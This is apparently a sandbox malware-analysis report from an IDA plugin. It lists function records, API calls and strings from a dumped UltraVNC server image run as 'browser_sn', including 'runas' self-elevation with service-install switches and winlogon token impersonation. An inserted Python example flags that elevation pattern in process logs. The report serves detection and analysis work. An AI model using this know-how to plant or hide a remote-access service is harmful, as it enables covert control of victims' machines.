                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: SHGetSettings$shell32.dll
                                                                            • API String ID: 145871493-1819508790
                                                                            • Opcode ID: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
                                                                            • Instruction ID: 2c633d8ab70f0ac9ed43765003304e3c9c2d5f19c7c610ef2117e997cc11ce9b
                                                                            • Opcode Fuzzy Hash: 77214687e6c2f938150f522afdd75d8ba5a5dca8d0fd701ab14ac9b329bd435a
                                                                            • Instruction Fuzzy Hash: 1D116D21A09B4282EE90CF55B48417923A0EF89B8AF5C1436DF9E82755DFBCE4418340
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$ObjectResetSingleWait$CriticalEnterSection
                                                                            • String ID:
                                                                            • API String ID: 3343876880-0
                                                                            • Opcode ID: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                                            • Instruction ID: a70c5a1708b626b20848c09fcc8b782b420e1485030d9ce178d7ffcc5227b8f8
                                                                            • Opcode Fuzzy Hash: d3057a2b6849e393004495c8da3765230f28397fe0c1293d29a74e0cbff77646
                                                                            • Instruction Fuzzy Hash: 91212F62A08A81D3EA989F22D5842AC7370FB85B9AF004171DF9E87750CF7CE4B4C740
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                            • String ID: winlogon.exe
                                                                            • API String ID: 1789362936-961692650
                                                                            • Opcode ID: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                                            • Instruction ID: ee6e598b5518088d48741a623e161e3d12456b41143f2f1fed90b19e7f346bd9
                                                                            • Opcode Fuzzy Hash: c88a6ee81a24712a405af00b899bfba8e059bc7f51f311d566bee420794a0777
                                                                            • Instruction Fuzzy Hash: C4118F31608A4681EB60DF25E8042A673B0FF8979EF444631DEAE87394DF7CD419C600
                                                                            APIs
                                                                            Strings
                                                                            • vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists, xrefs: 00007FF6C2BAC557
                                                                            • vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1, xrefs: 00007FF6C2BAC515
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeaveRevertSelfTimetime
                                                                            • String ID: vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::UNDoFTUserImpersonation - Impersonationtoken exists
                                                                            • API String ID: 4293870407-1873781047
                                                                            • Opcode ID: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
                                                                            • Instruction ID: 93f0e2f1531546084345734b6ae9f957bbd8432801a4a7b57cf0c51f300eaa4b
                                                                            • Opcode Fuzzy Hash: be91d13ce7b9590cac12ce48197b4f720c3c90b62c69517ca8b832bb9a46fa5f
                                                                            • Instruction Fuzzy Hash: 89115A61A08A8285EB549F7494483B937A1AF49B8EF480032DA8E86392CFBDE065D345
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                            • String ID: -startservice$p$runas
                                                                            • API String ID: 3648085421-278061118
                                                                            • Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                            • Instruction ID: 772520dcc6b32d68bc00fb0a049229f3ffc266753c9a0ac1dd4c4167ad624c28
                                                                            • Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                            • Instruction Fuzzy Hash: 2501C835619B8185E7A09F10F4943AAB3B4FB88749F900236DACD42B58DFBDD118CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                            • String ID: -uninstall$p$runas
                                                                            • API String ID: 3648085421-3602422011
                                                                            • Opcode ID: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
                                                                            • Instruction ID: e5f4fc6c54ea8def1a811b30e7392c0dc3f2672ba2f926f1cf201fedb6fc31c5
                                                                            • Opcode Fuzzy Hash: 5574e6ddee382544abc3d2c84dae34c608b18e4d42992b9071503c0150b71b53
                                                                            • Instruction Fuzzy Hash: CE01C835618B8185E7A09F10F4943AAB3B4FB88749F900236DACD42B58DFBDD118CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                            • String ID: -install$p$runas
                                                                            • API String ID: 3648085421-1683557327
                                                                            • Opcode ID: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                                            • Instruction ID: c3b29e806ae95132bb04f3df564c08bb8ef16716038e354ca16ffa1d5be8eb98
                                                                            • Opcode Fuzzy Hash: da01a03551f4b71eee5f038ed1fd70f8f3551a75722601959108e33cdc7658fd
                                                                            • Instruction Fuzzy Hash: B901C835618B8185E7A09F10F4943AAB3B4FB88749F900236DACD42B58DFBDD118CB40
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                            • String ID: -stopservice$p$runas
                                                                            • API String ID: 3648085421-4230321595
                                                                            • Opcode ID: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                                            • Instruction ID: c3d88afefa04ee0c08c19d1bf1f7f0afc3b98795be9f4e8613ed3ca39836b6c5
                                                                            • Opcode Fuzzy Hash: 7801f256456fabef1ba334d8cfc515ba8b90833b9c41cec9be355c3b8ea1ded8
                                                                            • Instruction Fuzzy Hash: B901C835618B81C5E7A09F10F4943AAB3B4FB88749F900236DACD42B58DFBDD118CB40
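The four function records above share one API set (ShellExecute, GetModuleFileName, GetForegroundWindow) and differ only in the switch string next to "runas": -install, -uninstall, -startservice, -stopservice. That combination is the server re-launching its own module path through the "runas" verb, i.e. a UAC elevation prompt, to register or control its Windows service, which is what the "launch a program with higher privileges" signature keys on. The helper below is an added example, not code from the Joe Sandbox report or from the UltraVNC project: it flags that pattern in process-creation telemetry. Everything about the event shape is my assumption (Sysmon-style dicts with Image, CommandLine, ParentImage, IntegrityLevel), the sample events are constructed, and the list of "expected" install folders is a policy choice, not something the report states.

```python
"""
Added example (not part of the Joe Sandbox report or the UltraVNC code base).

Flags process-creation events in which a binary is started with one of the
service switches seen beside "runas" in the dumped image. Two extra signals
raise the severity: the image lives outside the expected install folders,
and the parent image is the same file (GetModuleFileName + ShellExecute
"runas" produces exactly that parent/child pair).

Assumptions (mine, not the report's): Sysmon-style event dicts; constructed
sample events; EXPECTED_ROOTS is a local policy choice.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Switches found as strings next to "runas" in the function records above.
SERVICE_SWITCHES = {"-install", "-uninstall", "-startservice", "-stopservice"}

# Where an administrator-deployed VNC service is expected to live (assumption).
EXPECTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line, keeping double-quoted segments intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


@dataclass(frozen=True)
class Finding:
    image: str
    switches: Tuple[str, ...]
    reasons: Tuple[str, ...]

    def suspicious(self) -> bool:
        """Two or more independent signals: treat as worth an analyst's time."""
        return len(self.reasons) >= 2


def analyze(event: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding when the command line carries a VNC-style service switch."""
    tokens = tokenize(event.get("CommandLine", ""))
    switches = tuple(sorted({t.lower() for t in tokens[1:]} & SERVICE_SWITCHES))
    if not switches:
        return None

    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    reasons: List[str] = []

    if not image.lower().startswith(EXPECTED_ROOTS):
        reasons.append("service switch from unexpected folder")
    # Self re-launch: the elevated child is the same file as its parent.
    if parent and parent.lower() == image.lower():
        reasons.append("self re-launch with service switch")
    if event.get("IntegrityLevel", "").lower() == "high":
        reasons.append("runs elevated")
    return Finding(image=image, switches=switches, reasons=tuple(reasons))


def scan(events: List[Dict[str, str]]) -> List[Finding]:
    """Run analyze() over a batch of events and keep only the hits."""
    return [f for f in (analyze(e) for e in events) if f is not None]


# Constructed sample telemetry (not taken from the sandbox run).
SAMPLE_EVENTS = [
    {  # first launch from a temp folder, no switch, medium integrity
        "Image": "C:\\Users\\user\\AppData\\Local\\Temp\\svc.exe",
        "CommandLine": '"C:\\Users\\user\\AppData\\Local\\Temp\\svc.exe"',
        "ParentImage": "C:\\Windows\\explorer.exe",
        "IntegrityLevel": "Medium",
    },
    {  # elevated self re-launch to register the service
        "Image": "C:\\Users\\user\\AppData\\Local\\Temp\\svc.exe",
        "CommandLine": '"C:\\Users\\user\\AppData\\Local\\Temp\\svc.exe" -install',
        "ParentImage": "C:\\Users\\user\\AppData\\Local\\Temp\\svc.exe",
        "IntegrityLevel": "High",
    },
    {  # benign: an admin starting an installed copy's service from a shell
        "Image": "C:\\Program Files\\UltraVNC\\winvnc.exe",
        "CommandLine": '"C:\\Program Files\\UltraVNC\\winvnc.exe" -startservice',
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "IntegrityLevel": "High",
    },
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("SUSPICIOUS" if finding.suspicious() else "info", finding)
```

The switch alone is a weak signal, since any administrator installing the server legitimately produces it; the folder and the parent-equals-child relationship are what separate a dropped copy elevating itself from a normal install, so the example reports both and lets the caller rank on `suspicious()`.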
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: freemalloc
                                                                            • String ID: vncencoder.cpp : failed to obtain colour map data!$vncencoder.cpp : generating 8-bit palette data$vncencoder.cpp : generating BGR233 palette data$vncencoder.cpp : remote palette data requested
                                                                            • API String ID: 3061335427-2748099863
                                                                            • Opcode ID: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                                            • Instruction ID: 8b2749995479e62a9d7d9170b5f56b3038178b725261e97b5d6b78e69a6567e4
                                                                            • Opcode Fuzzy Hash: 63f80d4832f6e4566eecb43401796b936a332ff03a4846ba86bc6f35182ff0bb
                                                                            • Instruction Fuzzy Hash: B241E062A1869681F7648F20A8417B977A0EF4678EF440032EECC83B9ADEBCE504C740
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Thread$CreateFileMessageModuleNamePlayPostResumeSound
                                                                            • String ID:
                                                                            • API String ID: 3945334538-0
                                                                            • Opcode ID: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                                            • Instruction ID: 2fa1cd62830d485d9d88c737b8e2690acafe4fcef5eb627534a839a1832eb33c
                                                                            • Opcode Fuzzy Hash: 6ea77f1f998ec3782ac377f9155b0b4839ff24fcf66b865c59a37faa4ce68111
                                                                            • Instruction Fuzzy Hash: 8F41C126B18A4181EB50DF25E4402BDA371EBCAB9EF484131DF9D83799DEBCD895C380
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo$_fileno_ftbuf
                                                                            • String ID:
                                                                            • API String ID: 2434734397-0
                                                                            • Opcode ID: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                                            • Instruction ID: 0245f7c59fd2d907b4be7ad1f9dd46e547dea725cc2170967b1e5e2705b94dc8
                                                                            • Opcode Fuzzy Hash: fedb473ed8e07211a0b48662a4d4207601b42be0040328777e4ad7852e106941
                                                                            • Instruction Fuzzy Hash: 2F314661A0864641EAD49F6959502F922A27F41BAEF505B31EFADC73D1CFBCE861C300
                                                                            APIs
                                                                            • malloc.LIBCMT ref: 00007FF6C2B9FFFD
                                                                              • Part of subcall function 00007FF6C2C38C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6C2C38C64
                                                                              • Part of subcall function 00007FF6C2C38C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6C2C4329C,?,?,?,00007FF6C2C47749,?,?,?,00007FF6C2C477F3), ref: 00007FF6C2C38C89
                                                                              • Part of subcall function 00007FF6C2C38C34: _callnewh.LIBCMT ref: 00007FF6C2C38CA2
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CAD
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CB8
                                                                            • free.LIBCMT ref: 00007FF6C2BA0097
                                                                              • Part of subcall function 00007FF6C2C38BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C38C0A
                                                                              • Part of subcall function 00007FF6C2C38BF4: _errno.LIBCMT ref: 00007FF6C2C38C14
                                                                              • Part of subcall function 00007FF6C2C38BF4: GetLastError.KERNEL32(?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C38C1C
                                                                            • free.LIBCMT ref: 00007FF6C2BA00BF
                                                                            Strings
                                                                            • This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted., xrefs: 00007FF6C2BA0068
                                                                            • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF6C2B9FFE0
                                                                            • vncclient.cpp : no password specified for server - client rejected, xrefs: 00007FF6C2BA0053
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                             • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmp
